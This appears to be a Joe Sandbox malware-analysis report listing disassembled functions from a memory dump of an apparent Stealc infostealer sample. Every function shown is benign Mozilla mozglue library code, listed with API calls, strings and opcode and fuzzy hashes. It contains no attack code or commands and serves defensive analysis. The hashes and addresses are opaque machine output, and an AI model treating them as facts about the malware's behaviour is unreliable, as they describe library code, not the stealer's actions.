Opcode ID: 90f221236f9c758d8c4fbac60442cc4c9557e89945be42d9e3dd0141c1741290
Instruction ID: 82ecdea170e85efb981b7807a77276d7979ef56b879c1db4c16a92e269626019
Opcode Fuzzy Hash: 90f221236f9c758d8c4fbac60442cc4c9557e89945be42d9e3dd0141c1741290
Instruction Fuzzy Hash: 212191766143049FCB08DF38C85461ABBE5EBCA310F04882EE59A837A1DB30D808CB41

Function 6BFA1B80 Relevance: 6.1, APIs: 4, Instructions: 77threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6BFA1B98
AcquireSRWLockExclusive.KERNEL32(?,?,6BFA1D96,00000000), ref: 6BFA1BA1
ReleaseSRWLockExclusive.KERNEL32(?,?,6BFA1D96,00000000), ref: 6BFA1BB5
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BFA1C25

Part of subcall function 6BFA1C60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,6BFA759E,?,?), ref: 6BFA1CB4

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentNow@ReleaseStamp@mozilla@@ThreadTimeV12@_free
String ID:
API String ID: 3699359333-0
Opcode ID: 9d6c117b82e5202e879041c71db4d43ed7dff9e60e5a356c7fe24fb134790c0f
Instruction ID: 2c37be056394c77b196195cfb9eb51f09f3d990b4e9d329452e4d8dafdd354f5
Opcode Fuzzy Hash: 9d6c117b82e5202e879041c71db4d43ed7dff9e60e5a356c7fe24fb134790c0f
Instruction Fuzzy Hash: 7321C172A00225DBDB089F36C4857AFBBB4AF87744F02045DD9125B2A1D77DEA05CB91

Function 6BFB7B10 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6BFB7B51
__aulldiv.LIBCMT ref: 6BFB7B6C
__aulldiv.LIBCMT ref: 6BFB7B8B
__aulldiv.LIBCMT ref: 6BFB7BB1

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: __aulldiv
String ID:
API String ID: 3732870572-0
Opcode ID: d00a51c4c5f930f9caa17efa13413b4b30e460f116377f5c22957434e894d04c
Instruction ID: d97950ea8fad44337b123f89be89f07a1a46bf855a49d12c1bba4e52e397cb93
Opcode Fuzzy Hash: d00a51c4c5f930f9caa17efa13413b4b30e460f116377f5c22957434e894d04c
Instruction Fuzzy Hash: FF212172B0060A5FD714CF7DDC86E6777F8EB85714B10863EE45AD7350E674A8008BA0

Function 6BFB7A10 Relevance: 6.1, APIs: 4, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 6BF6BF00: ??0ios_base@std@@IAE@XZ.MSVCP140(?,?,?,?,6BFB7A3F), ref: 6BF6BF11
Part of subcall function 6BF6BF00: ?init@?$basic_ios@DU?$char_traits@D@std@@@std@@IAEXPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@_N@Z.MSVCP140(?,00000000,?,6BFB7A3F), ref: 6BF6BF5D
Part of subcall function 6BF6BF00: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(?,6BFB7A3F), ref: 6BF6BF7E

?setprecision@std@@YA?AU?$_Smanip@_J@1@_J@Z.MSVCP140(?,00000013,00000000), ref: 6BFB7A48
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@_K@Z.MSVCP140(?,?), ref: 6BFB7A7A

Part of subcall function 6BF69830: free.MOZGLUE(?,?,?,6BFB7ABE), ref: 6BF6985B

??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 6BFB7AC0
??1ios_base@std@@UAE@XZ.MSVCP140 ref: 6BFB7AC8

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_streambuf@??0ios_base@std@@??1?$basic_streambuf@??1ios_base@std@@??6?$basic_ostream@?init@?$basic_ios@?setprecision@std@@D@std@@@2@_J@1@_Smanip@_U?$_V01@_V?$basic_streambuf@free
String ID:
API String ID: 3421697164-0
Opcode ID: f0d3597c9ac9c9a66a59ce6e2cbbecf607e1284d40885d4a9602aa23534ea168
Instruction ID: 2884a103ea165aa20515d249354f0e89746ae4a32275a38200cca9e56b47f000
Opcode Fuzzy Hash: f0d3597c9ac9c9a66a59ce6e2cbbecf607e1284d40885d4a9602aa23534ea168
Instruction Fuzzy Hash: 5B214C366043059BCB14DF28D895A9FBBE5EFC9354F04881CE84587365DB34E909CB92

Function 6BFB7930 Relevance: 6.1, APIs: 4, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 6BF6BF00: ??0ios_base@std@@IAE@XZ.MSVCP140(?,?,?,?,6BFB7A3F), ref: 6BF6BF11
Part of subcall function 6BF6BF00: ?init@?$basic_ios@DU?$char_traits@D@std@@@std@@IAEXPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@_N@Z.MSVCP140(?,00000000,?,6BFB7A3F), ref: 6BF6BF5D
Part of subcall function 6BF6BF00: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(?,6BFB7A3F), ref: 6BF6BF7E

?setprecision@std@@YA?AU?$_Smanip@_J@1@_J@Z.MSVCP140(?,00000012,00000000), ref: 6BFB7968
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@_J@Z.MSVCP140(6BFBA264,6BFBA264), ref: 6BFB799A

Part of subcall function 6BF69830: free.MOZGLUE(?,?,?,6BFB7ABE), ref: 6BF6985B

??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 6BFB79E0
??1ios_base@std@@UAE@XZ.MSVCP140 ref: 6BFB79E8

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_streambuf@??0ios_base@std@@??1?$basic_streambuf@??1ios_base@std@@??6?$basic_ostream@?init@?$basic_ios@?setprecision@std@@D@std@@@2@_J@1@_Smanip@_U?$_V01@_V?$basic_streambuf@free
String ID:
API String ID: 3421697164-0
Opcode ID: 9a98ce6c5ef8b112b981d44ba667f12b5af9767b7e8fa80c88175d150d549f2d
Instruction ID: 2d35c71f99462496ef7ba0f75b2b9368c1a7ec0d79f33dfea080b3e16e3e6d13
Opcode Fuzzy Hash: 9a98ce6c5ef8b112b981d44ba667f12b5af9767b7e8fa80c88175d150d549f2d
Instruction Fuzzy Hash: 2B214C366043059BCB04DF28D885A9FBBE5EFC9354F44881DE84587365DB34E909CB92

Function 6BFBAAE0 Relevance: 6.1, APIs: 4, Instructions: 59threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6BFBAAF8
EnterCriticalSection.KERNEL32(6BFDF770,?,6BF7BF9F), ref: 6BFBAB08
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,6BF7BF9F), ref: 6BFBAB39
LeaveCriticalSection.KERNEL32(6BFDF770,?,?,?,?,?,?,?,?,6BF7BF9F), ref: 6BFBAB6B

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: CriticalSection$CurrentEnterLeaveThread_stricmp
String ID:
API String ID: 1951318356-0
Opcode ID: 24b2cc2dc80ba1633c02843c510080199d6725dd04725a4bef6c5f8e00445333
Instruction ID: f7b5a4f382a08e9c88bbb6eb7f0f0679a443789572515b8b569fb19e216cb6c3
Opcode Fuzzy Hash: 24b2cc2dc80ba1633c02843c510080199d6725dd04725a4bef6c5f8e00445333
Instruction Fuzzy Hash: DA1133B291020A9FCF40DF79D849D9F7BB5EF853057044429E50597321EB35E509CBA1

Function 6BF9EB00 Relevance: 6.0, APIs: 4, Instructions: 30threadsynchronizationCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6BF9EB11
AcquireSRWLockExclusive.KERNEL32(6BFDF4B8), ref: 6BF9EB1E
memset.VCRUNTIME140(?,00000000,000000E0), ref: 6BF9EB3C
ReleaseSRWLockExclusive.KERNEL32(6BFDF4B8), ref: 6BF9EB5B
GetCurrentThreadId.KERNEL32 ref: 6BF9EBA4
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000), ref: 6BF9EBAC
GetCurrentThreadId.KERNEL32 ref: 6BF9EBC1
AcquireSRWLockExclusive.KERNEL32(6BFDF4B8,?,?,00000000), ref: 6BF9EBCE
?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000,?,?,00000000), ref: 6BF9EBE5
ReleaseSRWLockExclusive.KERNEL32(6BFDF4B8,00000000), ref: 6BF9EC37
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6BF9EC46
CloseHandle.KERNEL32(?), ref: 6BF9EC55
free.MOZGLUE(00000000), ref: 6BF9EC5C

Strings

[I %d/%d] profiler_start, xrefs: 6BF9EBB4
[I %d/%d] baseprofiler_save_profile_to_file(%s), xrefs: 6BF9EA9B

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: ExclusiveLock$CurrentThread$AcquireRelease$?profiler_init@baseprofiler@mozilla@@CloseHandleObjectSingleWait_getpidfreememset
String ID: [I %d/%d] baseprofiler_save_profile_to_file(%s)$[I %d/%d] profiler_start
API String ID: 2885072826-1186885292
Opcode ID: 3e02477d51ed96caab90cb5cb7bb7421da76a2e7256075268db0f0f13773c970
Instruction ID: 710f60f7702745a8db1e2689fd91fd77af1d3c1d28f9973efb8fa94f65dc364e
Opcode Fuzzy Hash: 3e02477d51ed96caab90cb5cb7bb7421da76a2e7256075268db0f0f13773c970
Instruction Fuzzy Hash: C2F0A033620210EBDB805F79EC89F967BA4ABC3655F044029E905D3271CBB9D44DC7B1

Function 6BFA20B0 Relevance: 6.0, APIs: 4, Instructions: 28threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6BFA20B7
AcquireSRWLockExclusive.KERNEL32(00000000,?,6BF8FBD1), ref: 6BFA20C0
ReleaseSRWLockExclusive.KERNEL32(00000000,?,6BF8FBD1), ref: 6BFA20DA
free.MOZGLUE(00000000,?,6BF8FBD1), ref: 6BFA20F1

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 2047719359-0
Opcode ID: 073d7dbdd7f3cc311201ec168e00ff6e2db311c9acba52027417a63dc381a66c
Instruction ID: 3e81bb4ff73f824bc82bedb2298836b165c653b0bd5b630daa684ceff5dcead3
Opcode Fuzzy Hash: 073d7dbdd7f3cc311201ec168e00ff6e2db311c9acba52027417a63dc381a66c
Instruction Fuzzy Hash: 82E0E5326006158BC2209F3A980464EBBE9FFC6214B10062AE506C3621DB7AE54686D6

Function 6BF59A20 Relevance: 5.3, APIs: 4, Instructions: 338COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?), ref: 6BF59B2C
memcpy.VCRUNTIME140(6BF599CF,00000000,?), ref: 6BF59BB6
memcpy.VCRUNTIME140(?,?,?), ref: 6BF59BF8
memcpy.VCRUNTIME140(?,?,?), ref: 6BF59DE4

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 638a38a361c0e9f923df4dda64d62816978b34c8abe6cb46d9191f171043d32a
Instruction ID: b5aa539fc8fc9b9933d689ba734728b428d6fea1cc9c1408a338acf152b2a824
Opcode Fuzzy Hash: 638a38a361c0e9f923df4dda64d62816978b34c8abe6cb46d9191f171043d32a
Instruction Fuzzy Hash: C7D16EB3A0020A9FDB14CF68C881AAEBBF2FF98314F148529E955A7351D735ED51CB90

Function 6BFA0A70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

Part of subcall function 6BF637F0: ?ensureCapacitySlow@ProfilingStack@baseprofiler@mozilla@@AAEXXZ.MOZGLUE(?,?,?,?,6BFB145F,baseprofiler::AddMarkerToBuffer,00000000,?,00000039,00000000), ref: 6BF6380A

Part of subcall function 6BF98DC0: moz_xmalloc.MOZGLUE(00000038,?,?,00000000,?,6BFB06E6,?,?,00000008,?,?,?,?,?,?,?), ref: 6BF98DCC

Part of subcall function 6BFA0B60: moz_xmalloc.MOZGLUE(00000080,?,?,?,?,6BFA138F,?,?,?), ref: 6BFA0B80

?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(?,00000001,?,?,6BFA138F,?,?,?), ref: 6BFA0B27
free.MOZGLUE(?,?,?,?,?,6BFA138F,?,?,?), ref: 6BFA0B3F

Strings

baseprofiler::profiler_capture_backtrace, xrefs: 6BFA0AB5

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: moz_xmalloc$?ensure?profiler_capture_backtrace_into@baseprofiler@mozilla@@Buffer@2@CapacityCaptureChunkedOptions@2@@ProfileProfilingSlow@StackStack@baseprofiler@mozilla@@free
String ID: baseprofiler::profiler_capture_backtrace
API String ID: 3592261714-147032715
Opcode ID: b49ec33e7ce18314bd9b876c60b4ea03510882e3f5991444eb0c8c0d36be4d5e
Instruction ID: 65c737c90cec4e68728a7faca929276118a64120d666ed4aa7be99c1686f1535
Opcode Fuzzy Hash: b49ec33e7ce18314bd9b876c60b4ea03510882e3f5991444eb0c8c0d36be4d5e
Instruction Fuzzy Hash: 1821E576A00206DBDB08DF78D891BBFB376EF85748F04046CD8059B3A1D7B9A904CBA1

Function 6BF5F180 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(?,?), ref: 6BF5F19B

Part of subcall function 6BF7D850: EnterCriticalSection.KERNEL32(?), ref: 6BF7D904
Part of subcall function 6BF7D850: LeaveCriticalSection.KERNEL32(?), ref: 6BF7D971
Part of subcall function 6BF7D850: memset.VCRUNTIME140(?,00000000,?), ref: 6BF7D97B

mozalloc_abort.MOZGLUE(?), ref: 6BF5F209

Strings

d, xrefs: 6BF5F1F5

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: CriticalSection$EnterLeavecallocmemsetmozalloc_abort
String ID: d
API String ID: 3775194440-2564639436
Opcode ID: 2e22470d9c7bbd992a73c5859ec43ec4ac147d85f22b0c08a80270f058d48474
Instruction ID: aa7f1bc2fd683003af7a9db31ad04ec64ac835cb4c4dffe9296df9041ee5c64b
Opcode Fuzzy Hash: 2e22470d9c7bbd992a73c5859ec43ec4ac147d85f22b0c08a80270f058d48474
Instruction Fuzzy Hash: 59118C37E0064D87DB008F28C9512FEF769DF96208B0151ADDC05AB632EB34DAC4C380

Function 6BF6CA10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

malloc.MOZGLUE(?), ref: 6BF6CA26

Part of subcall function 6BF6CAB0: EnterCriticalSection.KERNEL32(?), ref: 6BF6CB49
Part of subcall function 6BF6CAB0: LeaveCriticalSection.KERNEL32(?), ref: 6BF6CBB6

mozalloc_abort.MOZGLUE(?), ref: 6BF6CAA2

Strings

d, xrefs: 6BF6CA6C

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: CriticalSection$EnterLeavemallocmozalloc_abort
String ID: d
API String ID: 3517139297-2564639436
Opcode ID: 7800935cb54bed3dc168761767eb1073ad491ff79df20641a565f61d9e59738f
Instruction ID: 0bbb38aa7e7a17e670c75b4dc09e88d04b814f5a60f8f0503087b2093f5829ed
Opcode Fuzzy Hash: 7800935cb54bed3dc168761767eb1073ad491ff79df20641a565f61d9e59738f
Instruction Fuzzy Hash: 7111CE32D2069893DF01DB68C8211FEF775EF96204F459219DC89A7232FB35A5C8C380

Function 6BF71A50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

realloc.MOZGLUE(?,?), ref: 6BF71A6B

Part of subcall function 6BF71AF0: EnterCriticalSection.KERNEL32(?), ref: 6BF71C36

mozalloc_abort.MOZGLUE(?), ref: 6BF71AE7

Strings

d, xrefs: 6BF71AB1

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: CriticalEnterSectionmozalloc_abortrealloc
String ID: d
API String ID: 2670432147-2564639436
Opcode ID: 6519b8dbbe9abccadeaeef4a70611103d02d686f21fa8e8067c73571e41f616d
Instruction ID: 8f6a7e2cb4e1aa00838a128d091880f590d2a3e89ffc9a3216533f2cc33b7b3e
Opcode Fuzzy Hash: 6519b8dbbe9abccadeaeef4a70611103d02d686f21fa8e8067c73571e41f616d
Instruction Fuzzy Hash: 06112332D1025893EB109FA8D8255EEF775EF85204F04866ADD495B232EB34E6C8C380

Function 6BFB5900 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

SetEnvironmentVariableW.KERNEL32(MOZ_SKELETON_UI_RESTARTING,6BFD51C8), ref: 6BFB591A
CloseHandle.KERNEL32(FFFFFFFF), ref: 6BFB592B

Strings

MOZ_SKELETON_UI_RESTARTING, xrefs: 6BFB5915

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: CloseEnvironmentHandleVariable
String ID: MOZ_SKELETON_UI_RESTARTING
API String ID: 297244470-335682676
Opcode ID: 4c576a1ec1bfc51c10036719a6b2ee41029e572dc6cdf92b092454efb61b7f7e
Instruction ID: 72751a1abb11adc5ef980c1ca5e8c2aedb396d7851ea7055f724051d7f8b0254
Opcode Fuzzy Hash: 4c576a1ec1bfc51c10036719a6b2ee41029e572dc6cdf92b092454efb61b7f7e
Instruction Fuzzy Hash: D2E04832114240B7DB004B79C5187457FD49B57726F144648E669936F1C3BDD8449791

Function 6BF550E0 Relevance: 5.2, APIs: 4, Instructions: 213COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6BF54E9C,?,?,?,?,?), ref: 6BF5510A
memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6BF54E9C,?,?,?,?,?), ref: 6BF55167
memcpy.VCRUNTIME140(036477E8,?,?,?,?,?), ref: 6BF55196
memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6BF54E9C), ref: 6BF55234

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 933be0c35787ef1d59b8af2b73a0f28f4363cc6c90fe8bc4464883a815d3fd0d
Instruction ID: 3ec87c26b033130265307e9af181a847e902b0baf2660c051b486fefa76c9f5b
Opcode Fuzzy Hash: 933be0c35787ef1d59b8af2b73a0f28f4363cc6c90fe8bc4464883a815d3fd0d
Instruction Fuzzy Hash: A291AD36904616CFCB14CF18C490A5ABBA2FF99318B198588ED589F325D335FC92CBE0

Function 6BF908F0 Relevance: 5.2, APIs: 4, Instructions: 165COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6BFDE7DC), ref: 6BF90918
LeaveCriticalSection.KERNEL32(6BFDE7DC), ref: 6BF909A6
EnterCriticalSection.KERNEL32(6BFDE7DC,?,00000000), ref: 6BF909F3
LeaveCriticalSection.KERNEL32(6BFDE7DC), ref: 6BF90ACB

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 90f650afc168bc554ceb51251a2e387d6819f006c537474bf19f8603e632b578
Instruction ID: 32be829fec8e0e7102696a8326610edc9834ed00a2d6ebf6266a46ee145f38f5
Opcode Fuzzy Hash: 90f650afc168bc554ceb51251a2e387d6819f006c537474bf19f8603e632b578
Instruction Fuzzy Hash: EC51F733B20615CBFF08AE39E440B25B3A2EBC2F207194279D965977B0D779E84187D1

Function 6BFB59C0 Relevance: 5.2, APIs: 4, Instructions: 155COMMON

Download Yara Rule

APIs

malloc.MOZGLUE(?,?,?,?,?,?,?,?,00000008,?,6BF8E56A,?,|UrlbarCSSSpan,0000000E,?), ref: 6BFB5A47
memset.VCRUNTIME140(00000000,00000000,?,?,?,?,?,?,?,?,?,00000008,?,6BF8E56A,?,|UrlbarCSSSpan), ref: 6BFB5A5C
free.MOZGLUE(?), ref: 6BFB5A97
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000010), ref: 6BFB5B9D

Memory Dump Source

